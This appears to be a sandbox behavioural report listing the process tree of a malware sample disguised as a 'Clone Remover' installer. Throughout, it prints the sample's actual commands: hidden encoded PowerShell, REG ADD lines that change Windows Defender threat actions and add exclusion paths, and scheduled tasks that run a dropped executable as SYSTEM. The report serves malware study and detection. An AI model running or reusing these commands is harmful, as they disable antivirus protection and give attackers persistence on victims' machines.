- Writes to the Master Boot Record (MBR)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe"C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-FNNEC.tmp\is-L3J6H.tmp"C:\Users\Admin\AppData\Local\Temp\is-FNNEC.tmp\is-L3J6H.tmp" /SL4 $502B8 "C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe" 5198354 522242⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Query3⤵
-
-
C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 8524⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 8644⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 2564⤵
- Program crash
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /F /TN "CloneRemover 3.9"3⤵
-
-
C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe" c322aa8acb58a24b92f7268bee04d5363⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3172 -s 6724⤵
- Program crash
-
-
-
-
C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe"C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-DQEUK.tmp\is-OI5G3.tmp"C:\Users\Admin\AppData\Local\Temp\is-DQEUK.tmp\is-OI5G3.tmp" /SL4 $60276 "C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe" 5198354 522242⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Query3⤵
-
-
C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 160 -s 7684⤵
- Program crash
-
-
-
-
C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe"C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-Q3P1T.tmp\is-VHAAD.tmp"C:\Users\Admin\AppData\Local\Temp\is-Q3P1T.tmp\is-VHAAD.tmp" /SL4 $8036A "C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe" 5198354 522242⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Query3⤵
-
-
C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 880 -s 8524⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 880 -s 8644⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 880 -s 2284⤵
- Program crash
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /F /TN "CloneRemover 3.9"3⤵
-
-
C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe" c322aa8acb58a24b92f7268bee04d5363⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 64 -s 2404⤵
- Program crash
-
-
-
-
C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe"C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-8JUDL.tmp\is-CLNR1.tmp"C:\Users\Admin\AppData\Local\Temp\is-8JUDL.tmp\is-CLNR1.tmp" /SL4 $70374 "C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe" 5198354 522242⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"3⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Query3⤵
-
-
C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe" c322aa8acb58a24b92f7268bee04d5363⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3560 -s 6804⤵
- Program crash
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /F /TN "CloneRemover 3.9"3⤵
-
-
-
C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe"C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-4H2SM.tmp\is-2VSFS.tmp"C:\Users\Admin\AppData\Local\Temp\is-4H2SM.tmp\is-2VSFS.tmp" /SL4 $6027A "C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe" 5198354 522242⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Query3⤵
-
-
C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1560 -s 7684⤵
- Program crash
-
-
-
-
C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe"C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-86C5N.tmp\is-T5169.tmp"C:\Users\Admin\AppData\Local\Temp\is-86C5N.tmp\is-T5169.tmp" /SL4 $3013C "C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe" 5198354 522242⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Query3⤵
-
-
C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"3⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /F /TN "CloneRemover 3.9"3⤵
-
-
C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe" c322aa8acb58a24b92f7268bee04d5363⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\jeUhSkFkkIbgydTZa\xiEkNlOfzcWZMyi\hSziFol.exeC:\Users\Admin\AppData\Local\Temp\jeUhSkFkkIbgydTZa\xiEkNlOfzcWZMyi\hSziFol.exe 3T /site_id 757674 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RFoKlzoQU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RFoKlzoQU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SEHcMRqOySkqPjodpTR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SEHcMRqOySkqPjodpTR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aIsgkipqYqjkC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aIsgkipqYqjkC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iQQhDFQnTDUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iQQhDFQnTDUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jxVmDfoFnnvU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jxVmDfoFnnvU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\MMuRMqsaIxxaqhVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\MMuRMqsaIxxaqhVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\jeUhSkFkkIbgydTZa\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\jeUhSkFkkIbgydTZa\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZuCHwPloRhxnZBJU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZuCHwPloRhxnZBJU\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RFoKlzoQU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RFoKlzoQU" /t REG_DWORD /d 0 /reg:324⤵
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RFoKlzoQU" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SEHcMRqOySkqPjodpTR" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SEHcMRqOySkqPjodpTR" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aIsgkipqYqjkC" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aIsgkipqYqjkC" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iQQhDFQnTDUn" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iQQhDFQnTDUn" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jxVmDfoFnnvU2" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jxVmDfoFnnvU2" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\MMuRMqsaIxxaqhVB /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\MMuRMqsaIxxaqhVB /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\jeUhSkFkkIbgydTZa /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\jeUhSkFkkIbgydTZa /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZuCHwPloRhxnZBJU /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZuCHwPloRhxnZBJU /t REG_DWORD /d 0 /reg:643⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gUXgXcezS" /SC once /ST 03:59:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gUXgXcezS"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gUXgXcezS"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NCFohduUlgzsvLtPH" /SC once /ST 04:32:55 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZuCHwPloRhxnZBJU\hLSrlDewNYVbAhL\xDAwZRH.exe\" Ym /site_id 757674 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "NCFohduUlgzsvLtPH"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
